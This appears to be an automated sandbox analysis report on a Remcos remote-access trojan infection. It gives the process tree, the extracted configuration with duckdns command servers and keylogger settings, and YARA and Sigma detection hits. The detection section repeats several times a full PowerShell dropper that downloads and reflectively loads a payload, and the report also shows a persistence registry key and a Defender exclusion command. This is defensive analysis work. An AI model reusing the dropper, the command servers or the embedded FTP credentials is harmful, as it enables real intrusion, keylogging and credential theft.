    • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2676 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 932 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7972 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 6408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 6520 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6644 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 3796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["iwarsut775laudrye001.duckdns.org:57484:0", "iwarsut775laudrye001.duckdns.org:57483:1", "iwarsut775laudrye3.duckdns.org:57484:0", "hjnourt38haoust1.duckdns.org:57484:0"], "Assigned name": "Cla$$", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-DDGG2A", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kanspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\kanspt.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x13f30:$a1: Remcos restarted by watchdog!
  • 0x144a8:$a3: %02i:%02i:%02i:%03i
00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Source | Rule | Description | Author | Strings
40.2.powershell.exe.1b33d0e6cd0.1.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
40.2.powershell.exe.1b33d0e6cd0.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
40.2.powershell.exe.1b33d0e6cd0.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
40.2.powershell.exe.1b33d0e6cd0.1.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x690b8:$a1: Remcos restarted by watchdog!
  • 0x69630:$a3: %02i:%02i:%02i:%03i
40.2.powershell.exe.1b33d0e6cd0.1.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6317c:$str_b2: Executing file:
  • 0x641fc:$str_b3: GetDirectListeningPort
  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63d28:$str_b7: \update.vbs
  • 0x631a4:$str_b9: Downloaded file:
  • 0x63190:$str_b10: Downloading file:
  • 0x63234:$str_b12: Failed to upload file:
  • 0x641c4:$str_b13: StartForward
  • 0x641e4:$str_b14: StopForward
  • 0x63c80:$str_b15: fso.DeleteFile "
  • 0x63c14:$str_b16: On Error Resume Next
  • 0x63cb0:$str_b17: fso.DeleteFolder "
  • 0x63224:$str_b18: Uploaded file:
  • 0x631e4:$str_b19: Unable to delete:
  • 0x63c48:$str_b20: while fso.FileExists("
  • 0x636c1:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
amsi64_1928.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = [obfuscated base64 / [char]66 concatenation payload omitted]
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = [obfuscated base64 / [char]66 concatenation payload omitted]
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 
,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1928, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 6908, ProcessName: powershell.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", ProcessId: 5460, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join 
[char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1928, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1", Proces
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_zhs
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, ProcessId: 7996, ProcessName: cmd.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
